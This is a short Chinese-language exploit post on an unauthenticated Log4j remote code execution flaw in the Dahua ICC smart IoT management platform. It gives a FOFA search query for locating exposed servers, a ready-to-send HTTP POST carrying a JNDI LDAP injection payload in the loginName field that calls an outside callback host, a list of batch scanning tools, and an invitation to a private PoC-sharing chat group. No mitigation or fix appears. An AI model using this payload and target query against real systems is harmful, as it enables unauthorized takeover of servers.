0x01 產(chǎn)品簡(jiǎn)介

大華ICC智能物聯(lián)綜合管理平臺(tái)對(duì)技術(shù)組件進(jìn)行模塊化和松耦合，將解決方案分層分級(jí)，提高面向智慧物聯(lián)的數(shù)據(jù)接入與生態(tài)合作能力。

0x02 漏洞概述

大華ICC智能物聯(lián)綜合管理平臺(tái)/evo-apigw/evo-brm/1.2.0/user/is-exist 接口處存在 l0g4i遠(yuǎn)程代碼執(zhí)行漏洞，未經(jīng)身份驗(yàn)證的攻擊者可以利用此漏洞遠(yuǎn)程代碼執(zhí)行，進(jìn)一步構(gòu)造系統(tǒng)內(nèi)部利用鏈可導(dǎo)致服務(wù)器失陷。

0x03 搜索語(yǔ)法

FOFA：body="*客戶端會(huì)小于800*"

0x04 漏洞復(fù)現(xiàn)

POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8{
"loginName":"${jndi:ldap://xxxx.dnslog.pw}"
}

0x05 工具批量

nuclei

afrog

xray

POC腳本獲取

請(qǐng)使用VX掃一掃加入內(nèi)部POC腳本分享圈子